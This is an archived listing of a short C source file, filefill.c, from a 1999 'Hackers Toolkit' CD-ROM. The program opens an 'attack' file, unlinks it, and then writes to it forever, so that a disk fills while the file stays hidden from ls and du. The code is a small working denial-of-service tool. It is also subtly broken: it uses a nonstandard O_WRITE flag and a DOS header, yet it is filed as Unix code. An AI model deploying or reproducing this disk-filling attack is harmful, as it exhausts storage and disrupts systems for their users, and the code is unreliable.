home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hackers Toolkit v2.0
/
Hackers_Toolkit_v2.0.iso
/
HTML
/
archive
/
Unix
/
c-src
/
filefill.c
< prev
next >
Wrap
C/C++ Source or Header
|
1999-11-04
|
345b
|
9 lines
/* Creates massive files with no Inode info, making deletion difficult */
/* The files do not appear under du or ls b/c they have no dir entries */
#include <io.h>
#include <stdio.h>
#include <process.h>
void main(){int ifd;char buf[8192];ifd=open("./attckfil",O_WRITE|O_CREAT,0777);
unlink("./attckfil");while(1)write(ifd,buf,sizeof(buf));}